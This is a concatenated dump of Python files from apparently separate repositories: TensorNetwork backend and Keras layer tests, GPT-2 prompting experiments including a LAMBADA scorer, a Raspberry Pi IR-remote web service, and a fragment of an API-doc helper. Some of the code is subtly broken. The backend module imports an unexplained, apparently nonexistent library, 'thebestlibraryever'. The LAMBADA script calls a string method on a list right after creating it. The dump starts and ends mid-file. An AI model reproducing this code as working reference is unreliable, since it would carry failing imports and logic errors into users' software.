schedule.run_pending()
sleep(1)
```
|
{
"source": "jeff-bezos-amazon/TensorNetwork",
"score": 3
}
|
#### File: TensorNetwork/tensornetwork/backend_contextmanager.py
```python
from typing import Text, Union
from tensornetwork.backends.abstract_backend import AbstractBackend
from tensornetwork.backends import backend_factory
import thebestlibraryever
class DefaultBackend():
"""Context manager for setting up backend for nodes"""
def __init__(self, backend: Union[Text, AbstractBackend]) -> None:
if not isinstance(backend, (Text, AbstractBackend)):
raise ValueError("Item passed to DefaultBackend "
"must be Text or BaseBackend")
self.backend = backend
def __enter__(self):
_default_backend_stack.stack.append(self)
def __exit__(self, exc_type, exc_val, exc_tb):
_default_backend_stack.stack.pop()
class _DefaultBackendStack():
"""A stack to keep track default backends context manager"""
def __init__(self):
self.stack = []
self.default_backend = "numpy"
def get_current_backend(self):
return self.stack[-1].backend if self.stack else self.default_backend
_default_backend_stack = _DefaultBackendStack()
def get_default_backend():
return _default_backend_stack.get_current_backend()
def set_default_backend(backend: Union[Text, AbstractBackend]) -> None:
if _default_backend_stack.stack:
raise AssertionError("The default backend should not be changed "
"inside the backend context manager")
if not isinstance(backend, (Text, AbstractBackend)):
raise ValueError("Item passed to set_default_backend "
"must be Text or BaseBackend")
if isinstance(backend, Text) and backend not in backend_factory._BACKENDS:
raise ValueError(f"Backend '{backend}' was not found.")
_default_backend_stack.default_backend = backend
```
#### File: tensornetwork/tn_keras/test_layer.py
```python
import pytest
import numpy as np
import math
import os
import shutil
from tensorflow.keras import backend as K
from tensorflow.keras.models import Sequential, load_model # type: ignore
import tensorflow as tf
from tensornetwork.tn_keras.dense import DenseDecomp
from tensornetwork.tn_keras.mpo import DenseMPO
from tensornetwork.tn_keras.condenser import DenseCondenser
from tensornetwork.tn_keras.expander import DenseExpander
from tensornetwork.tn_keras.entangler import DenseEntangler
from tensorflow.keras.layers import Dense # type: ignore
@pytest.fixture(params=[512])
def dummy_data(request):
np.random.seed(42)
# Generate dummy data for use in tests
data = np.random.randint(10, size=(1000, request.param))
labels = np.concatenate((np.ones((500, 1)), np.zeros((500, 1))), axis=0)
return data, labels
@pytest.fixture(params=[
'DenseDecomp', 'DenseMPO', 'DenseCondenser', 'DenseExpander',
'DenseEntangler', 'DenseEntanglerAsymmetric'
])
def make_model(dummy_data, request):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
if request.param == 'DenseMPO':
model = Sequential()
model.add(
DenseMPO(data.shape[1],
num_nodes=int(math.log(int(data.shape[1]), 8)),
bond_dim=8,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseDecomp':
model = Sequential()
model.add(
DenseDecomp(512,
decomp_size=128,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseCondenser':
model = Sequential()
model.add(
DenseCondenser(exp_base=2,
num_nodes=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseExpander':
model = Sequential()
model.add(
DenseExpander(exp_base=2,
num_nodes=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseEntangler':
num_legs = 3
leg_dim = round(data.shape[-1]**(1. / num_legs))
assert leg_dim**num_legs == data.shape[-1]
model = Sequential()
model.add(
DenseEntangler(leg_dim**num_legs,
num_legs=num_legs,
num_levels=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
elif request.param == 'DenseEntanglerAsymmetric':
num_legs = 3
leg_dim = round(data.shape[-1]**(1. / num_legs))
assert leg_dim**num_legs == data.shape[-1]
model = Sequential()
model.add(
DenseEntangler((leg_dim * 2)**num_legs,
num_legs=num_legs,
num_levels=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
model.add(Dense(1, activation='sigmoid'))
return model
def test_train(dummy_data, make_model):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
tf.random.set_seed(0)
data, labels = dummy_data
model = make_model
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
# Train the model for 10 epochs
history = model.fit(data, labels, epochs=10, batch_size=32)
# Check that loss decreases and accuracy increases
assert history.history['loss'][0] > history.history['loss'][-1]
assert history.history['accuracy'][0] < history.history['accuracy'][-1]
def test_weights_change(dummy_data, make_model):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
tf.random.set_seed(0)
data, labels = dummy_data
model = make_model
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
before = model.get_weights()
model.fit(data, labels, epochs=5, batch_size=32)
after = model.get_weights()
# Make sure every layer's weights changed
for i, _ in enumerate(before):
assert (after[i] != before[i]).any()
def test_output_shape(dummy_data, make_model):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
data = K.constant(data)
input_shape = data.shape
model = make_model
actual_output_shape = model(data).shape
expected_output_shape = model.compute_output_shape(input_shape)
np.testing.assert_equal(expected_output_shape, actual_output_shape)
@pytest.fixture(params=[(100, 10, 10, 512), (100, 512), (20, 10, 512)])
def high_dim_data(request):
np.random.seed(42)
# Generate dummy data for use in tests
data = np.random.randint(10, size=request.param)
return data
@pytest.fixture(params=[
'DenseDecomp', 'DenseMPO', 'DenseCondenser', 'DenseExpander',
'DenseEntangler'
])
def make_high_dim_model(high_dim_data, request):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data = high_dim_data
if request.param == 'DenseMPO':
model = Sequential()
model.add(
DenseMPO(data.shape[-1],
num_nodes=int(math.log(int(data.shape[-1]), 8)),
bond_dim=8,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
elif request.param == 'DenseDecomp':
model = Sequential()
model.add(
DenseDecomp(512,
decomp_size=128,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
elif request.param == 'DenseCondenser':
model = Sequential()
model.add(
DenseCondenser(exp_base=2,
num_nodes=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
elif request.param == 'DenseExpander':
model = Sequential()
model.add(
DenseExpander(exp_base=2,
num_nodes=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
elif request.param == 'DenseEntangler':
num_legs = 3
leg_dim = round(data.shape[-1]**(1. / num_legs))
assert leg_dim**num_legs == data.shape[-1]
model = Sequential()
model.add(
DenseEntangler(leg_dim**num_legs,
num_legs=num_legs,
num_levels=3,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
return data, model
def test_higher_dim_input_output_shape(make_high_dim_model):
# pylint: disable=redefined-outer-name
data, model = make_high_dim_model
actual_output_shape = model(data).shape
expected_output_shape = model.compute_output_shape(data.shape)
np.testing.assert_equal(expected_output_shape, actual_output_shape)
def test_decomp_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
output_dim = 256
decomp_size = 128
model = Sequential()
model.add(
DenseDecomp(output_dim,
decomp_size=decomp_size,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
# num_params = a_params + b_params + bias_params
expected_num_parameters = (data.shape[1] * decomp_size) + (
decomp_size * output_dim) + output_dim
np.testing.assert_equal(expected_num_parameters, model.count_params())
def test_mpo_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
output_dim = data.shape[1]
num_nodes = int(math.log(data.shape[1], 8))
bond_dim = 8
model = Sequential()
model.add(
DenseMPO(output_dim,
num_nodes=num_nodes,
bond_dim=bond_dim,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
in_leg_dim = math.ceil(data.shape[1]**(1. / num_nodes))
out_leg_dim = math.ceil(output_dim**(1. / num_nodes))
# num_params = num_edge_node_params + num_middle_node_params + bias_params
expected_num_parameters = (2 * in_leg_dim * bond_dim * out_leg_dim) + (
(num_nodes - 2) * in_leg_dim * bond_dim * bond_dim *
out_leg_dim) + output_dim
np.testing.assert_equal(expected_num_parameters, model.count_params())
def test_condenser_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
exp_base = 2
num_nodes = 3
model = Sequential()
model.add(
DenseCondenser(exp_base=exp_base,
num_nodes=num_nodes,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
output_dim = data.shape[-1] // (exp_base**num_nodes)
# num_params = (num_nodes * num_node_params) + num_bias_params
expected_num_parameters = (num_nodes * output_dim * output_dim *
exp_base) + output_dim
np.testing.assert_equal(expected_num_parameters, model.count_params())
def test_expander_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
exp_base = 2
num_nodes = 3
model = Sequential()
model.add(
DenseExpander(exp_base=exp_base,
num_nodes=num_nodes,
use_bias=True,
activation='relu',
input_shape=(data.shape[-1],)))
output_dim = data.shape[-1] * (exp_base**num_nodes)
# num_params = (num_nodes * num_node_params) + num_bias_params
expected_num_parameters = (num_nodes * data.shape[-1] * data.shape[-1] *
exp_base) + output_dim
np.testing.assert_equal(expected_num_parameters, model.count_params())
def test_entangler_num_parameters(dummy_data):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, _ = dummy_data
num_legs = 3
num_levels = 3
leg_dim = round(data.shape[-1]**(1. / num_legs))
assert leg_dim**num_legs == data.shape[-1]
model = Sequential()
model.add(
DenseEntangler(leg_dim**num_legs,
num_legs=num_legs,
num_levels=num_levels,
use_bias=True,
activation='relu',
input_shape=(data.shape[1],)))
# num_params = entangler_node_params + bias_params
expected_num_parameters = num_levels * (num_legs - 1) * (leg_dim**4) + (
leg_dim**num_legs)
np.testing.assert_equal(expected_num_parameters, model.count_params())
@pytest.mark.parametrize('num_levels', list(range(1, 4)))
@pytest.mark.parametrize('num_legs', list(range(2, 6)))
@pytest.mark.parametrize('leg_dims', [(4, 8), (8, 4)])
def test_entangler_asymmetric_num_parameters_output_shape(num_legs,
num_levels,
leg_dims):
leg_dim, out_leg_dim = leg_dims
data_shape = (leg_dim ** num_legs,)
model = Sequential()
model.add(
DenseEntangler(out_leg_dim**num_legs,
num_legs=num_legs,
num_levels=num_levels,
use_bias=True,
activation='relu',
input_shape=data_shape))
primary = leg_dim
secondary = out_leg_dim
if leg_dim > out_leg_dim:
primary, secondary = secondary, primary
expected_num_parameters = (num_levels - 1) * (num_legs - 1) * (primary**4) + (
num_legs - 2) * primary**3 * secondary + primary**2 * secondary**2 + (
out_leg_dim**num_legs)
np.testing.assert_equal(expected_num_parameters, model.count_params())
data = np.random.randint(10, size=(10, data_shape[0]))
out = model(data)
np.testing.assert_equal(out.shape, (data.shape[0], out_leg_dim**num_legs))
def test_config(make_model):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
model = make_model
expected_num_parameters = model.layers[0].count_params()
# Serialize model and use config to create new layer
model_config = model.get_config()
layer_config = model_config['layers'][0]['config']
if 'mpo' in model.layers[0].name:
new_model = DenseMPO.from_config(layer_config)
elif 'decomp' in model.layers[0].name:
new_model = DenseDecomp.from_config(layer_config)
elif 'condenser' in model.layers[0].name:
new_model = DenseCondenser.from_config(layer_config)
elif 'expander' in model.layers[0].name:
new_model = DenseExpander.from_config(layer_config)
elif 'entangler' in model.layers[0].name:
new_model = DenseEntangler.from_config(layer_config)
# Build the layer so we can count params below
new_model.build(layer_config['batch_input_shape'])
# Check that original layer had same num params as layer built from config
np.testing.assert_equal(expected_num_parameters, new_model.count_params())
def test_model_save(dummy_data, make_model, tmp_path):
# Disable the redefined-outer-name violation in this function
# pylint: disable=redefined-outer-name
data, labels = dummy_data
model = make_model
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
# Train the model for 5 epochs
model.fit(data, labels, epochs=5, batch_size=32)
for save_path in ['test_model', 'test_model.h5']:
# Save model to a SavedModel folder or h5 file, then load model
save_path = tmp_path / save_path
model.save(save_path)
loaded_model = load_model(save_path)
# Clean up SavedModel folder
if os.path.isdir(save_path):
shutil.rmtree(save_path)
# Clean up h5 file
if os.path.exists(save_path):
os.remove(save_path)
# Compare model predictions and loaded_model predictions
np.testing.assert_equal(model.predict(data), loaded_model.predict(data))
```
|
{
"source": "jeffbinder/boolean-prompting",
"score": 3
}
|
#### File: jeffbinder/boolean-prompting/discouraging_words.py
```python
import codecs
import nltk
import random
import scipy.stats
from generation_utils import *
model_type = 'gpt2'
model_name_or_path = 'gpt2-xl'
device = 'cuda'
length = 300
do_sample = True
temperature = 0.6
top_k = 5
top_p = 0.5
repetition_penalty = 1.5
num_return_sequences = 10
num_batches = 100
seed = 14891435220765460437
experiment_name = "snake~legs"
prompt_v1 = '''Scientists recently discovered a new species of snake. Here is a description of it:'''
prompt_v2 = '''Scientists recently discovered a new species of snake{~ with legs}. Here is a description of it:'''
words_to_count = [("leg", "legs", "legged"), ("fur", "furred", "furry"), ("hair", "hairs", "haired", "hairy")]
barnard_test_alternative = "greater"
f1 = codecs.open(f"discouraging-results/{experiment_name}-v1", "w", "utf8")
f2 = codecs.open(f"discouraging-results/{experiment_name}-v2", "w", "utf8")
# Initialize the model and tokenizer
torch.manual_seed(seed)
try:
model_class, tokenizer_class = MODEL_CLASSES[model_type]
except KeyError:
raise KeyError("the model {} you specified is not supported. You are welcome to add it and open a PR :)")
tokenizer = tokenizer_class.from_pretrained(model_name_or_path)
model = model_class.from_pretrained(model_name_or_path)
model.to(device)
model.eval()
def adjust_length_to_model(length, max_sequence_length):
if length < 0 and max_sequence_length > 0:
length = max_sequence_length
elif 0 < max_sequence_length < length:
length = max_sequence_length # No generation bigger than model size
elif length < 0:
length = MAX_LENGTH # avoid infinite loop
return length
length = adjust_length_to_model(length, max_sequence_length=model.config.max_position_embeddings)
counts_1 = {word: 0 for word in words_to_count}
counts_2 = {word: 0 for word in words_to_count}
for batch_num in range(num_batches):
print(f"Batch {batch_num}")
for i, prompt in enumerate([prompt_v1, prompt_v2]):
# Needed to avoid weirdness with Torch's random number generator
output_sequences = model.generate(
prompt=prompt,
tokenizer=tokenizer,
max_length=length,
temperature=temperature,
top_k=top_k,
top_p=top_p,
repetition_penalty=repetition_penalty,
do_sample=do_sample,
num_return_sequences=num_return_sequences,
pad_token_id = 0,
verbose=True,
)
# Remove the batch dimension when returning multiple sequences
if len(output_sequences.shape) > 2:
output_sequences.squeeze_()
generated_sequences = []
for generated_sequence_idx, generated_sequence in enumerate(output_sequences):
generated_sequence = generated_sequence.tolist()
generated_sequence = [idx for idx in generated_sequence if idx != 0]
idx = generated_sequence_idx + batch_num * num_return_sequences
# Decode text
generated_text = tokenizer.decode(generated_sequence, clean_up_tokenization_spaces=True)
f = f1 if i == 0 else f2
f.write(f"Sequence {idx}:\n{generated_text}\n\n----------\n")
counts = counts_1 if i == 0 else counts_2
toks = [tok.lower() for tok in nltk.word_tokenize(generated_text)]
for word in words_to_count:
variant_found = False
for variant in word:
if variant in toks:
variant_found = True
break
if variant_found:
counts[word] += 1
f1.flush()
f2.flush()
print("word\tv1\tv2")
n = num_return_sequences * (batch_num+1)
for word in words_to_count:
x1 = counts_1[word]
x2 = counts_2[word]
print(f"{word}\t{x1}/{n}\t{x2}/{n}")
print("word\tv1\tv2\tp")
n = num_return_sequences * num_batches
for word in words_to_count:
x1 = counts_1[word]
x2 = counts_2[word]
o = scipy.stats.barnard_exact([[x1, x2], [n-x1, n-x2]], alternative=barnard_test_alternative)
p = o.pvalue
print(f"{word}\t{x1}/{n}\t{x2}/{n}\t{p}")
f1.close()
f2.close()
```
#### File: jeffbinder/boolean-prompting/generate.py
```python
from generation_utils import *
model_type = 'gpt2'
model_name_or_path = 'gpt2-xl'
device = 'cuda'
length = 100
do_sample = True
temperature = 0.6
k = 5
p = 0.5
repetition_penalty = 1.5
num_return_sequences = 10
overlap_factor = 0.25
prompt_text = '''Scientists recently discovered a new species of {serpent~snake}. Here is a description of it:'''
# Initialize the model and tokenizer
try:
model_class, tokenizer_class = MODEL_CLASSES[model_type]
except KeyError:
raise KeyError("the model {} you specified is not supported. You are welcome to add it and open a PR :)")
tokenizer = tokenizer_class.from_pretrained(model_name_or_path)
model = model_class.from_pretrained(model_name_or_path)
model.to(device)
model.eval()
def adjust_length_to_model(length, max_sequence_length):
if length < 0 and max_sequence_length > 0:
length = max_sequence_length
elif 0 < max_sequence_length < length:
length = max_sequence_length # No generation bigger than model size
elif length < 0:
length = MAX_LENGTH # avoid infinite loop
return length
length = adjust_length_to_model(length, max_sequence_length=model.config.max_position_embeddings)
import time
start_time = time.time()
output_sequences = model.generate(
prompt=prompt_text,
overlap_factor=overlap_factor,
tokenizer=tokenizer,
max_length=length,
temperature=temperature,
top_k=k,
top_p=p,
repetition_penalty=repetition_penalty,
do_sample=do_sample,
num_return_sequences=num_return_sequences,
pad_token_id=0,
verbose=True,
)
print(f"Time: {time.time() - start_time}s")
# Remove the batch dimension when returning multiple sequences
if len(output_sequences.shape) > 2:
output_sequences.squeeze_()
generated_sequences = []
for generated_sequence_idx, generated_sequence in enumerate(output_sequences):
generated_sequence = generated_sequence.tolist()
generated_sequence = [idx for idx in generated_sequence if idx != 0]
# Decode text
generated_text = tokenizer.decode(generated_sequence, clean_up_tokenization_spaces=True)
if num_return_sequences > 1:
print(f'Generated sequence {generated_sequence_idx}:')
print(generated_text)
```
#### File: jeffbinder/boolean-prompting/lambada_score.py
```python
import json
import math
import numpy as np
import nltk
import os
import re
import sys
import torch
import transformers
from generation_utils import *
model_type = 'gpt2'
model_name_or_path = 'gpt2'
device = 'cuda'
test_mode = 'token'
repetition_penalty = None
suppress_punctuation = True
batch_size = 20
prompting_mode = 'sentence' # One of 'default', 'blank', 'fixed', 'word', 'phrase', 'sentence', 'sentence|blank', 'sentence|word', 'sentence|phrase', 'sentence|word|phrase'
prefix = '[...]'
fixed_negative_prompt = '[...] and'
finetune_sentence_tokenizer = False
regularize_text = False
overlap_factor = 0.0
re_phrase_boundary = re.compile('[,.:;?!"“”]')
# Initialize the model and tokenizer
model_class = MODEL_CLASSES[model_type][0]
tokenizer_class = MODEL_CLASSES[model_type][1]
tokenizer = tokenizer_class.from_pretrained(model_name_or_path)
model = model_class.from_pretrained(model_name_or_path)
model.to(device)
model.eval()
if model_type == 'xlm':
re_word = re.compile(r"^ ?[A-Za-z']+(</w>)?$")
re_final_punct = re.compile(r"^.*?([^A-Za-z' ]+(</w>)?)$")
re_first_punct_on = re.compile(r"^.*?([^@A-Za-z' ]+.*)$")
elif model_type == 'ctrl':
re_word = re.compile(r"^ ?[@A-Za-z']+$")
re_final_punct = re.compile(r"^.*s?([^@A-Za-z' ]+)$")
re_first_punct_on = re.compile(r"^.*?([^@A-Za-z' ]+.*)$")
elif model_type == 'xlnet':
re_word = re.compile(r"^ ?[A-Za-z'▁]+$")
else:
re_word = re.compile(r"^ ?[A-Za-z']+$")
if model_type == 'xlm':
def is_word_piece(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
return re_word.match(tok) and not tok.endswith('</w>')
elif model_type == 'ctrl':
def is_word_piece(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
return tok.endswith('@@')
elif model_type == 'xlnet':
def is_word_piece(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
return re_word.match(tok) and not tok.startswith('▁')
else:
def is_word_piece(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
string = tokenizer.convert_tokens_to_string([tok])
return re_word.match(string) and not string.startswith(' ')
def is_punctuation(idx):
tok = tokenizer.convert_ids_to_tokens([idx])[0]
string = tokenizer.convert_tokens_to_string([tok])
return not re_word.match(string)
punctuation = []
word_pieces = []
vocab = tokenizer.get_vocab()
vocab_size = len(vocab)
for tok in vocab:
idx = vocab[tok]
tok = tokenizer.convert_tokens_to_string([tok])
if not re_word.match(tok):
punctuation.append([idx])
if model_type in ('xlm', 'ctrl') and test_mode == 'token' and is_word_piece(idx):
word_pieces.append([idx])
bos_token = tokenizer.bos_token or tokenizer.cls_token or ''
if model_type == 'ctrl':
bos_token = 'Books '
# The models have word pieces at the beginning of the word, so we must add in an offset when
# locating word boundaries
if model_type in ('xlm', 'ctrl'):
word_piece_offset = 1
else:
word_piece_offset = 0
if model_type in ('xlm', 'ctrl') and test_mode == 'token':
# Do not allow the prediction of word pieces in token mode because they cannot come at the
# end of sentence in these models
bad_words_ids = punctuation.copy() if suppress_punctuation else []
bad_words_ids += word_pieces
elif model_type in ('openai-gpt', 'gpt2', 'xlnet') and test_mode == 'word':
# Conversely, with these models, the word pieces come at the end, so they must be suppressed
# at the beginning when we are trying to predict a word.
bad_words_ids = punctuation.copy() if suppress_punctuation else []
bad_words_ids += word_pieces
else:
bad_words_ids = punctuation if suppress_punctuation else None
fixed_negative_prompt = model.escape_prompt(fixed_negative_prompt)
def run_model(prompt):
output = model.generate(
prompt=prompt,
overlap_factor=overlap_factor,
tokenizer=tokenizer,
pad_token_id=0,
max_length=1,
repetition_penalty=repetition_penalty,
do_sample=False,
num_return_sequences=1,
bad_words_ids=bad_words_ids,
return_dict_in_generate=True,
output_scores=True,
)
output_sequences = output.sequences
if test_mode == 'word':
# Punctuation is not suppressed after the first token, since it provides one of the ways
# by which models can decide that the word has ended. The only straightforward way to implement
# this given how generate() is implemented is to call it twice.
guess_1 = output_sequences[0, -1]
tok_1 = tokenizer.decode([guess_1])
prompt_2 = '{' + prompt + '}' + tok_1
output_2 = model.generate(
prompt=prompt_2,
overlap_factor=overlap_factor,
tokenizer=tokenizer,
pad_token_id=0,
max_length=5,
repetition_penalty=repetition_penalty,
do_sample=False,
num_return_sequences=1,
return_dict_in_generate=True,
output_scores=True,
)
output_sequences = torch.cat([output_sequences, output_2.sequences], dim=1)
if test_mode == 'token':
guess = output_sequences[0, -1]
return guess
else:
n = output_sequences.shape[1]
j = 1 - word_piece_offset
while j < n - word_piece_offset and is_word_piece(output_sequences[0, j]):
j += 1
end = j + word_piece_offset
guess = output_sequences[0, :end].to('cpu')
return guess
sent_tokenizer = nltk.tokenize.punkt.PunktSentenceTokenizer()
if finetune_sentence_tokenizer:
f = open('../../data/gpt-2/data/lambada_development.jsonl')
text = []
text = text.replace('\n', ' ').replace(' ', ' ').replace('“', '"').replace('”', '"').replace('’', '\'').replace('‘', '\'')
for line in f.readlines():
text.append(json.loads(line)['text'] + ".")
text = '\n'.join(text)
f.close()
sent_tokenizer.train(text)
def split_last_sentence(text):
# The following is necessary to get the sentence tokenizer to behave
regularized_text = text.replace('\n', ' ').replace(' ', ' ').replace('“', '"').replace('”', '"').replace('’', '\'').replace('‘', '\'')
sentences = sent_tokenizer.tokenize(regularized_text)
n = len(sentences[-1])
return text[:-(n+1)], text[-n:]
def interpret_line(line):
text = json.loads(line)['text']
if regularize_text:
text = text.replace('\n', ' ').replace(' ', ' ').replace('“', '"').replace('”', '"').replace('’', '\'').replace('‘', '\'')
# Separate the prompt from the desired output
ids = tokenizer.encode(text, add_special_tokens=False, return_tensors="pt")
if test_mode == 'token':
prompt = ids[0,:-1]
answer = ids[0,-1]
else:
n = ids.shape[1]
i = 1 + word_piece_offset
while i <= n:
if not is_word_piece(ids[0,-i]):
break
i += 1
i -= word_piece_offset
prompt = ids[0,:-i]
answer = ids[0,-i:]
prompt = tokenizer.decode(prompt)
prompt = model.escape_prompt(prompt)
if prompting_mode == 'default':
pass
elif prompting_mode == 'blank':
prompt = f'{prompt}~'
elif prompting_mode == 'fixed':
prompt = f'{prompt}~{fixed_negative_prompt}'
elif prompting_mode == 'word':
toks = nltk.word_tokenize(prompt)
last_tok = model.escape_prompt(toks[-1])
prompt = f'{prompt}~{prefix}{last_tok}'
elif prompting_mode == 'phrase':
phrases = re_phrase_boundary.split(prompt)
last_phrase = model.escape_prompt(phrases[-1])
prompt = f'{prompt}~{prefix}{last_phrase}'
elif prompting_mode == 'sentence':
first_sentences, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
prompt = f'{prompt}~{prefix}{last_sentence}'
elif prompting_mode == 'sentence|blank':
first_sentences, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
prompt = f'{prompt}~{prefix}{{{last_sentence}|}}'
elif prompting_mode == 'sentence|word':
_, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
toks = nltk.word_tokenize(prompt)
last_tok = model.escape_prompt(toks[-1])
prompt = f'{prompt}~{prefix}{{{last_sentence}|{last_tok}}}'
elif prompting_mode == 'sentence|phrase':
_, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
phrases = re_phrase_boundary.split(prompt)
last_phrase = model.escape_prompt(phrases[-1])
prompt = f'{prompt}~{prefix}{{{last_sentence}|{last_phrase}}}'
elif prompting_mode == 'sentence|word|phrase':
_, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
toks = nltk.word_tokenize(prompt)
last_tok = model.escape_prompt(toks[-1])
phrases = re_phrase_boundary.split(prompt)
last_phrase = model.escape_prompt(phrases[-1])
prompt = f'{prompt}~{prefix}{{{last_sentence}|{last_tok}|{last_phrase}}}'
else:
raise ValueError("Unknown prompting mode!")
return text, prompt, answer
f = open('../../data/gpt-2/data/lambada_test.jsonl')
total_score = 0.0
texts = []
prompts = []
answers = []
for line in f.readlines():
text, prompt, answer = interpret_line(line)
texts.append(text)
prompts.append(prompt)
answers.append(answer)
n = 0
ncorrect = 0
for text, prompt, answer in zip(texts, prompts, answers):
guess = run_model(prompt)
n += 1
if model_type == 'ctrl' and test_mode == 'token':
guess = [guess]
answer = [answer]
if test_mode == 'token':
if model_type in ('xlm', 'ctrl'):
guess_text = tokenizer.decode(guess)
m = re_final_punct.match(guess_text)
if m:
guess_text = guess_text[:-len(m.group(1))]
answer_text = tokenizer.decode(answer)
correct = guess_text == answer_text
else:
correct = guess == answer
else:
if model_type in ('xlm', 'ctrl'):
guess_text = tokenizer.decode(guess)
m = re_first_punct_on.match(guess_text)
if m:
guess_text = guess_text[:-len(m.group(1))]
answer_text = tokenizer.decode(answer)
correct = guess_text == answer_text
else:
correct = guess.equal(answer)
if correct:
ncorrect += 1
if n % 100 == 0:
guess = tokenizer.decode(guess)
print('----------')
print(f'Text: {text}')
print(f'Guess: {guess} - {"correct" if correct else "wrong"} ({ncorrect}/{n} = {100*ncorrect/n})')
print(f'Final results: {ncorrect}/{n} = {100*ncorrect/n}')
```
|
{
"source": "jeff-blaisdell/raspberrypi-tv",
"score": 2
}
|
#### File: ir-service/web/devices.py
```python
import os.path
import yaml
from time import sleep
import subprocess
from not_found import NotFound
from execute_command_failure import ExecuteCommandFailure
from os import listdir
from os.path import isfile, join
commands_dir = "/var/data/ir-service/commands"
def list_devices():
return [f[:-4] for f in listdir(commands_dir) if isfile(join(commands_dir, f)) and f.endswith(".yml")]
def list_device_commands(device_id):
device_yml = "{}/{}.yml".format(commands_dir, device_id)
print("checking {} for device commands".format(device_yml))
if not (os.path.isfile(device_yml)):
raise NotFound("{} device not found".format(device_id))
with open(device_yml, 'r') as f:
return yaml.load(f.read())
def get_device_command(device_id, command_id):
commands = list_device_commands(device_id)["commands"]
if not (command_id in commands):
raise NotFound("{} command not found for device {}".format(command_id, device_id))
return commands[command_id]
def execute_device_command(device_id, command_id):
command = get_device_command(device_id, command_id)
if isinstance(command, list):
for c in command:
if isinstance(c, str) and (c.startswith("wait ")):
millis = int(c[5:]) * 0.001
sleep(millis)
elif isinstance(c, dict):
remote = c["remote"]
key = c["key"]
result = subprocess.call(["irsend", "SEND_ONCE", remote, key])
if not result == 0:
raise ExecuteCommandFailure(
"Failed to execute action {} of command {} on device {}".format(c, command_id, device_id)
)
def execute(text):
lowercase_text = text.lower()
devices = [d for d in list_devices() if d in lowercase_text]
device = next(iter(devices or []), None)
if device:
commands = [c for c in list_device_commands(device)["commands"] if c in lowercase_text]
command = next(iter(commands or []), None)
if command:
execute_device_command(device, command)
return
raise NotFound("Device / Command not found for text {}".format(lowercase_text))
```
|
{
"source": "jeffbonnes/titanium_mobile",
"score": 2
}
|
#### File: titanium_mobile/apidoc/common.py
```python
import os, sys, re
simple_tag_pattern = re.compile(r"<[^>]*?>")
not_real_titanium_types = ("Titanium.Proxy", "Titanium.Module", "Titanium.Event")
DEFAULT_PLATFORMS = ["android", "blackberry", "iphone", "ipad", "mobileweb"]
platform_names = { "android": "Android", "blackberry": "BlackBerry",
"iphone": "iPhone", "ipad": "iPad", "mobileweb": "Mobile Web"}
initial_platform_version = { "blackberry": "3.1.2", "mobileweb" : "1.8"}
platform_namespaces = [ "Android", "iOS", "iPhone", "iPad", "MobileWeb", "BlackBerry" ]
# odict source is in docgen folder (parent of this folder).
# Newer versions of Python also have OrderedDict.
this_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.abspath(os.path.join(this_dir, "..")))
try:
from collections import OrderedDict
except:
from odict import odict as OrderedDict
## {{{ http://code.activestate.com/recipes/576720/ (r6)
## From <NAME>, licensed under MIT License
def lazyproperty(func):
"""A decorator for lazy evaluation of properties
"""
cache = {}
def _get(self):
try:
return cache[self]
except KeyError:
cache[self] = value = func(self)
return value
return property(_get)
## end of http://code.activestate.com/recipes/576720/ }}}
def strip_tags(value):
return simple_tag_pattern.sub("", value)
def dict_has_non_empty_member(d, member_name):
return member_name in d and d[member_name] is not None and len(d[member_name]) > 0
def to_ordered_dict(orig_dict, key_order):
already_added = []
odict = OrderedDict()
for key in key_order:
if key in orig_dict:
odict[key] = orig_dict[key]
already_added.append(key)
